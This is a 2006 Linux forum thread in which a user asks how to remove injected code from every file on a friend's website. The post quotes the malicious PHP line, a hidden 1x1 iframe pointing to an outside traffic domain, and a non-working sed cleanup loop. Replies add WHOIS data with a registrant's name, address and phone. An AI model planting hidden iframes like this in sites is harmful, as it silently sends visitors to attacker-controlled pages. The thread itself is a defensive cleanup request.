Results 1 to 3 of 3
All the files at one of my friend's website is virus infected, it has inserted following code in it.
<? echo ('<html><head><title></title></head><body><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html>');?>
Now I want to replace ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
- 01-03-2006 #1Just Joined!
- Join Date
- Jan 2006
- Posts
- 1
my friend's website is virus infected with this code
All the files at one of my friend's website is virus infected, it has inserted following code in it.
<? echo ('<html><head><title></title></head><body><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html>');?>
Now I want to replace all the code with nothing.
for a in $(find -type f -not -regex '.*\/\.svn.*'); do sed -e 's/<\?\s echo\s \(\'<html><head><title><\/title><\/head\><body><iframe\s src=\"http:\/\/www\.blackh\.info\/traff\/\"\s width=1\s height=1><\/iframe><\/body><\/html>\'\);\?>//g' $a > $a.modifiedfile; mv -f $a.modifiedfile $a; done
since he is use subversion I can't edit inside .svn folders.
This is not working as I am not comfortable with regex and escape characters.
Please help urgently
Thanks,
AjiNIMC
- 01-05-2006 #2Banned
- Join Date
- Sep 2005
- Posts
- 567
How many files?
Can't you export/populate the data out of SVN?
- 01-06-2006 #3Linux Newbie
- Join Date
- Apr 2005
- Location
- Rockford, MI 49341
- Posts
- 125
This is where the code is calling to:
Hope that this is a help for you.Code:Domain ID:D11497946-LRMS Domain Name:BLACKH.INFO Created On:12-Dec-2005 13:09:30 UTC Last Updated On:12-Dec-2005 16:26:20 UTC Expiration Date:12-Dec-2006 13:09:30 UTC Sponsoring Registrar:Direct Information Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS) Status:TRANSFER PROHIBITED Registrant ID:DI_2202160 Registrant Name:Mihail Krukov Registrant Organization:N/A Registrant Street1:Sovnarkomovskaya, 4, 25 Registrant Street2: Registrant Street3: Registrant City:Nizhniy Novgorod Registrant State/Province:Moskovskaya oblast Registrant Postal Code:606660 Registrant Country:RU Registrant Phone:+7.8312255554 Registrant Phone Ext.: Registrant FAX: Registrant FAX Ext.: Registrant ************@mail.ru Admin ID:DI_2202160 Admin Name:Mihail Krukov Admin Organization:N/A Admin Street1:Sovnarkomovskaya, 4, 25 Admin Street2: Admin Street3: Admin City:Nizhniy Novgorod Admin State/Province:Moskovskaya oblast Admin Postal Code:606660 Admin Country:RU Admin Phone:+7.8312255554 Admin Phone Ext.: Admin FAX: Admin FAX Ext.: Admin ************@mail.ru Billing ID:DI_2202160 Billing Name:Mihail Krukov Billing Organization:N/A Billing Street1:Sovnarkomovskaya, 4, 25 Billing Street2: Billing Street3: Billing City:Nizhniy Novgorod Billing State/Province:Moskovskaya oblast Billing Postal Code:606660 Billing Country:RU Billing Phone:+7.8312255554 Billing Phone Ext.: Billing FAX: Billing FAX Ext.: Billing ************@mail.ru Tech ID:DI_2202160 Tech Name:Mihail Krukov Tech Organization:N/A Tech Street1:Sovnarkomovskaya, 4, 25 Tech Street2: Tech Street3: Tech City:Nizhniy Novgorod Tech State/Province:Moskovskaya oblast Tech Postal Code:606660 Tech Country:RU Tech Phone:+7.8312255554 Tech Phone Ext.: Tech FAX: Tech FAX Ext.: Tech ************@mail.ru Name Server:NS1.MEGAHOSTER.NET Name Server:NS2.MEGAHOSTER.NET
I would also send a copy of the cade to megahoster.net and let them know what is going on.<advertising NOT allowed in signatures>
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
